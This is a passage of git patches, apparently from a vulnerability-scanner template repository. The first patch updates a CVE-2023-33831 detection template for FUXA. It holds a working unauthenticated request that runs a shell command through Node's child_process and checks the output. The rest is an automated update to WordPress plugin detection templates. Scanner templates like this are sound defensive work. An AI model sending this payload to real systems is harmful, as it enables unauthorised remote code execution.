 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:6fa9152640ec641decaf368f20f140a35d2d220f
+templates-checksum.txt:4f3360c7f2951ae3deaa88df7b8f521132ae1293
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From ffa4a84ba9e758b8c0aa72eeb8bf629bc9d2d34b Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Mon, 2 Oct 2023 00:47:23 +0530
Subject: [PATCH 0642/1090] added metadata and updated matcher

---
 http/cves/2023/CVE-2023-33831.yaml | 18 +++++++++++++++---
 1 file changed, 15 insertions(+), 3 deletions(-)

diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml
index 11c573f6fb..f70ceae370 100644
--- a/http/cves/2023/CVE-2023-33831.yaml
+++ b/http/cves/2023/CVE-2023-33831.yaml
@@ -17,8 +17,15 @@ info:
     epss-score: 0.003140000
     epss-percentile: 0.667090000
     cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:*
+  metadata:
+    fofa-query: title="FUXA"
+    max-request: 1
+    verified: "true"
   tags: cve,cve2023,rce,frangoteam,fuxa,unauth
 
+variables:
+  filename: "{{rand_base(6)}}"
+
 http:
   - raw:
       - |
@@ -26,16 +33,21 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{randstr}}')"}}}
+        {"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{filename}}')"}}}
 
       - |
-        GET /_images/{{randstr}} HTTP/1.1
+        GET /_images/{{filename}} HTTP/1.1
         Host: {{Hostname}}
 
     matchers-condition: and
     matchers:
       - type: word
-        part: body
+        part: body_1
+        words:
+          - 'Script OK:'
+
+      - type: word
+        part: body_2
         words:
           - 'uid'
           - 'gid'

From 658d741b4436a84d42d7dfb1e913de0f11b2b479 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 2 Oct 2023 04:02:10 +0000
Subject: [PATCH 0643/1090] Auto WordPress Plugins Update [Mon Oct  2 04:02:10
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/wp-user-avatar.txt                    | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml            | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml             | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml      | 1 -
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml                | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml         | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml    | 1 -
 .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml  | 1 -
 http/technologies/wordpress/plugins/amp.yaml                    | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml            | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml          | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml            | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml               | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml     | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml          | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml       | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                 | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml    | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml             | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml         | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml        | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml           | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                   | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml               | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml          | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml            | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml         | 1 -
 .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml         | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml     | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml        | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml          | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml     | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml    | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml           | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml    | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml       | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml      | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml             | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml      | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml          | 1 -
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/elementor.yaml              | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml       | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml   | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml        | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml  | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml   | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml             | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml      | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml      | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml               | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml             | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml           | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml          | 1 -
 http/technologies/wordpress/plugins/formidable.yaml             | 1 -
 http/technologies/wordpress/plugins/forminator.yaml             | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml    | 1 -
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml    | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml       | 1 -
 .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml        | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml             | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml             | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml              | 1 -
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml           | 1 -
 .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml          | 1 -
 http/technologies/wordpress/plugins/health-check.yaml           | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml            | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml    | 1 -
 http/technologies/wordpress/plugins/imagify.yaml                | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml               | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml           | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml         | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml          | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml             | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml          | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml                | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml         | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                  | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                 | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml        | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml   | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml         | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml              | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml       | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml               | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml            | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml           | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml       | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml               | 1 -
 http/technologies/wordpress/plugins/members.yaml                | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml               | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml              | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml             | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml             | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml        | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml            | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml            | 1 -
 .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml  | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml           | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml           | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml     | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml           | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml          | 1 -
 http/technologies/wordpress/plugins/polylang.yaml               | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml          | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml            | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml              | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml       | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml         | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml            | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml  | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml      | 1 -
 http/technologies/wordpress/plugins/redirection.yaml            | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml        | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml  | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml               | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml       | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml          | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml            | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml    | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml           | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml             | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml              | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml      | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml         | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml      | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml  | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml         | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml            | 1 -
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml             | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml   | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml    | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml    | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml       | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml          | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml        | 1 -
 .../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml            | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml           | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml       | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml             | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml         | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml             | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml           | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml             | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml        | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml        | 1 -
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml    | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml           | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml   | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml          | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml         | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml   | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml              | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml     | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml          | 1 -
 http/technologies/wordpress/plugins/worker.yaml                 | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml     | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml               | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-seopress.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml             | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml         | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml         | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml           | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml         | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml  | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml            | 1 -
 201 files changed, 1 insertion(+), 201 deletions(-)

diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt
index 1bc53e339d..f54e21527a 100644
--- a/helpers/wordpress/plugins/wp-user-avatar.txt
+++ b/helpers/wordpress/plugins/wp-user-avatar.txt
@@ -1 +1 @@
-4.13.3
\ No newline at end of file
+4.13.4
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
